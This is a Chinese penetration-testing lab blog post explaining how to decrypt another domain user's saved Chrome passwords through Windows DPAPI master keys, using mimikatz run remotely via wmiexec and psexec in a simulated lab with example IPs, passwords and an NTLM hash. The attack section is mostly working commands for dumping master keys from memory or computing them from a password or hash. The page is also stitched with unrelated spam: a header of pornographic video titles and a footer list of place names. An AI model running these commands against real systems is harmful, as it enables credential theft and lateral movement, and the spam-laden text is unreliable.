老赵揉搓苏清雅双乳的视频_老头老太性行交视频_老同学3免费集_老师没戴套子C了我一天视频_老师的丰满大乳奶_老师把我添高潮了A片潘金莲

咨詢(xún)服務(wù)熱線

400-6446-808

創(chuàng)安實(shí)驗(yàn)室專(zhuān)欄
您的當(dāng)前位置:首頁(yè) > 創(chuàng)安實(shí)驗(yàn)室專(zhuān)欄
使用mimikatz導(dǎo)出chrome密碼
發(fā)布者:創(chuàng)信華通  發(fā)布時(shí)間:2022-08-01  瀏覽量:804次


寫(xiě)在前面

古語(yǔ)有云:“學(xué)如逆水行舟,不進(jìn)則退?!泵鎸?duì)如今隨時(shí)都在變化的網(wǎng)絡(luò)安全環(huán)境更是如此。為此,創(chuàng)信華通微信公眾號(hào)特開(kāi)設(shè)“滲透專(zhuān)欄”,以記錄創(chuàng)信華通創(chuàng)安攻防實(shí)驗(yàn)室在滲透技術(shù)上的探索,加強(qiáng)同行間的交流,相互學(xué)習(xí),共同進(jìn)步。




?使用mimikatz導(dǎo)出chrome密碼

  2022.07.25




模擬場(chǎng)景

在獲取某PC本地administrator的權(quán)限情況下,導(dǎo)出使用該P(yáng)C機(jī)域普通賬號(hào)的密碼。

受害機(jī)ip:

192.168.3.4

受害機(jī)賬戶(hù):


· 本地管理員:administrator/toor

· 域普通賬戶(hù):beta\fengjie/qqq123!@#




加密機(jī)制簡(jiǎn)介

chrome儲(chǔ)存的明文密碼時(shí)使用windows提供的DPAPI進(jìn)行對(duì)稱(chēng)加密來(lái)保證安全性。加解密的密鑰稱(chēng)為master key。master key被用戶(hù)登錄密碼、SID和16字節(jié)隨機(jī)數(shù)加密后保存在Master Key file(%APPDATA%\Microsoft\Protect\%SID%)中。



最簡(jiǎn)單的情況:A用戶(hù)拖A自己的密碼

1

dpapi::chrome /in:'C:\Users\fengjie\AppData\Local\Google\Chromr\User

2

Data\Default\Login Data' /unprotect



在A用戶(hù)登陸狀態(tài)B解密A的chrome密碼

在用戶(hù)登陸狀態(tài)下可以直接用procdump或者mimikatz直接從內(nèi)存中獲取master key。

1

privilege::debug

2

sekurlsa::dpapi

3


4

python wmiexec.py administrator:toor@192.168.3.4 'c:\users\public\mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit'


Alt text

獲取到masterkey

1

0bf0be64d4dc768a543b3a12d7c5210d184c07a3861cad8f2bd8b7bbacc60fd0e06e955b6dad057d070d1ce3b2bb331fd8dbce6efad08808f1849e4f4ef26d80

1b81b1c9cb66a3f93b58f85948e8ce53779c6e5d   

2




接下來(lái)用mimikatz一把梭就可以了

1

python wmiexec.py administrator:toor@192.168.3.4 'cd c:\users\public && Minimimini64.exe "dpapi::chrome

/in:\"C:\Users\fengjie\AppData\Local\Google\Chrome\User Data\Default\Login Data\" /masterkey:1b81b1c9cb66a3f93b58f85948e8ce53779c6e5d" exit '



最開(kāi)始用wmiexec并未解密成功

Alt text

后來(lái)發(fā)現(xiàn)是wmiexec的鍋換成psexec就好了(用smbexec也可以,懷疑是因?yàn)橛脀miexec時(shí)令牌完整性受限的原因,知道的師傅請(qǐng)教我一手)

Alt text


在A用戶(hù)離線狀態(tài)B解密A的chrome密碼

現(xiàn)在用mimikatz重新抓已經(jīng)抓不到fengjie的master key了

Alt text

用戶(hù)明文密碼已知


這種情況下有兩種方法可以選擇。

1.如果我們知道fengjie的明文密碼,可以用runas降權(quán)(或者進(jìn)行一些spwan的操作降權(quán)),降權(quán)之后又回到了最簡(jiǎn)單的情況。(因?yàn)閞unas需要交互式shell,所以這種方法比較雞肋)

1

runas /user:fengjie@beta.com "cmd.exe"

2


3

mimikatz dpapi::chrome /in:”%localappdata%\Google\Chrome\User

Data\Default\Cookies” /unprotect


2.在沒(méi)有交互式的情況下可以直接用mimikatz直接算出master key。

1

dpapi::masterkey 

/in:"c:\Users\fengjie\AppData\Roaming\Microsoft\Protect\S-1-5-21-2274946182-2013957047-1890316882-1632\59a94dbc-6dbb-4d51-bec0-edebc6f2e9f8"

/password:qqq123!@#


Alt text

拿到master key后情況又相當(dāng)于又轉(zhuǎn)換回了用戶(hù)在線的情景。

用戶(hù)明文密碼未知,知道NTLM hash


1

dpapi::masterkey 

/in:"c:\Users\fengjie\AppData\Roaming\Microsoft\Protect\S-1-5-21-2274946182-2013957047-1890316882-1632\59a94dbc-6dbb-4d51-bec0-edebc6f2e9f8" 

/hash:632f6adad4510099d676724bfb87c6ee


Alt text




總結(jié)

簡(jiǎn)單的說(shuō)就是三種情況:

A用戶(hù)獲取自己chrome密碼不需要知道m(xù)aster key

A獲取B用戶(hù),如果B用戶(hù)在線,那么可以直接從內(nèi)存中抓取出B的maste key

A獲取B用戶(hù),B不在線,就需要用b用戶(hù)的明文密碼或者NTLM hash計(jì)算出master key,在回到上面一步。



本文由創(chuàng)信華通創(chuàng)安攻防實(shí)驗(yàn)室編輯。

本文僅限于個(gè)人學(xué)習(xí)和技術(shù)研究,由于傳播、利用此文所提供的信息而造成刑事案件、非授權(quán)攻擊等違法行為,均由使用者本人負(fù)責(zé),本單位不為此承擔(dān)任何責(zé)任。創(chuàng)安攻防實(shí)驗(yàn)室擁有對(duì)此文章的修改和解釋權(quán),如欲轉(zhuǎn)載或傳播此文章,必須保證此文章的完整性,包括版權(quán)聲明等全部?jī)?nèi)容。


如有侵權(quán),請(qǐng)聯(lián)系后臺(tái)。




創(chuàng)安攻防實(shí)驗(yàn)室

創(chuàng)安攻防實(shí)驗(yàn)室,是成都創(chuàng)信華通信息技術(shù)有限公司旗下的技術(shù)研究團(tuán)隊(duì),成立于2021年9月,主要研究紅藍(lán)對(duì)抗、重大安全保障、應(yīng)急響應(yīng)等方向。

創(chuàng)安攻防實(shí)驗(yàn)室圓滿(mǎn)完成了多次公安舉辦的重要網(wǎng)絡(luò)安全保障和攻防演習(xí)活動(dòng),并積極參加各類(lèi)網(wǎng)絡(luò)安全競(jìng)賽,屢獲殊榮。

創(chuàng)安攻防實(shí)驗(yàn)室秉承創(chuàng)信華通的發(fā)展理念,致力打造國(guó)內(nèi)一流網(wǎng)絡(luò)安全團(tuán)隊(duì)。


·END·



滦南县| 宁安市| 左贡县| 松江区| 永仁县| 开阳县| 台北市| 凤凰县| 台中县| 三河市| 百色市| 湾仔区| 桂东县| 桃园县| 平潭县| 珠海市| 齐齐哈尔市| 莆田市| 武隆县| 磐石市| 芜湖市| 谷城县| 罗源县| 苏尼特左旗| 比如县| 延川县| 南澳县| 红安县| 临安市| 舟曲县| 临澧县| 固原市| 荆门市| 宁强县| 陆河县| 石家庄市| 九龙坡区| 怀仁县| 博兴县| 延安市| 游戏|